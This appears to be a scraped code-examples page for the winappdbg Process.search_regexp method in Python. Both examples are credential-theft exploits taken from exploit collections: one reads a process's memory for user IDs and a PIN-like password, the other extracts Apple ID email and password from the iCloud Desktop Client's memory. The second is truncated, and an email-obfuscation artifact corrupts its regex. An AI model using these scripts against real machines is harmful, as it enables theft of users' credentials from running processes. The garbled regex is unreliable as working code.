

Python Process.search_regexp Method Code Examples

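This article collects typical usage examples of the winappdbg.Process.search_regexp method in Python. If you are wondering how exactly Process.search_regexp is used, how to call it, or what examples of it look like, the selected code examples here may help. You can also look further into usage examples of winappdbg.Process, the class this method belongs to.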


A total of 2 code examples of the Process.search_regexp method are shown below, sorted by popularity by default.

Example 1: memory_search

# Required import: from winappdbg import Process [as alias]
# Or: from winappdbg.Process import search_regexp [as alias]
import re
from winappdbg import Process
def memory_search( pid ):
    found = []
    # Instantiate a Process object.
    process = Process( pid )
    # Search for the string in the process memory.

    # Looking for User ID:
    userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
    for address in process.search_regexp( userid_pattern ):
        found += [address]

    print 'Possible UserIDs found:'
    found = [i[-1] for i in found]
    for i in set(found):
        print i.replace('\x00','')

    found = []
    # Looking for Password:
    pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
    for address in process.search_regexp( pass_pattern ):
        found += [process.read(address[0]-3,16)]
    if found:
        print '\nPassword:'
    if len(found) > 1:
        s = list(set([x for x in found if found.count(x) > 1]))
        for i in s:
            pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
        print pwd
    else:
        print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]

    return found
Developer ID: AlexxNica, project: exploit-database, lines of code: 34, source file: 40342.py

Example 2: Process

# Required import: from winappdbg import Process [as alias]
# Or: from winappdbg.Process import search_regexp [as alias]
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		
		user_pattern = '\x61\x70\x70\x6C\x65\x49\x44\x3D([a-zA-Z0-9_.+-][email protected][a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)'
		for address in process.search_regexp(user_pattern):
			memory_dump.append(address)
		usr = memory_dump[0][2].split('=')[1]
		
		memory_dump = []
		pass_pattern = '\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00[\x01-\x02][\x08-\x09]([A-Za-z0-9\!\@\#\$\%\^\&\*\(\)\_\+\{\}\:\"\|\<\>\?\[\]\;\'\,\.\\\/\=\-]){8,20}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
		for address in process.search_regexp(pass_pattern):
			lproj = re.findall('([a-z]{2}\.lproj)|(apple-[a-z]{0,3})', address[2])
			if not lproj:
				cstr = re.sub(r'\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00[\x01-\x02][\x08-\x09]|\x00', '', address[2])
				memory_dump.append(cstr)
		pwd = memory_dump[6]
		
		if usr != '' and pwd !='':
			found = 1
			print "[+] iCloud Credentials found!\r\n----------------------------------------"
Developer ID: yakir-wizman, project: Vulnerabilities, lines of code: 33, source file: Apple+iCloud+Desktop+Client+v5.2.1.0+Local+Credentials+Disclosure+After+Sign+Out+Exploit.py


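Note: The winappdbg.Process.search_regexp examples in this article were compiled by 纯净天空 from open-source code and documentation platforms such as Github/MSDocs. The snippets were selected from open-source projects contributed by their respective developers; copyright of the source code belongs to the original authors, and distribution and use should follow the License of the corresponding project. Do not reproduce without permission.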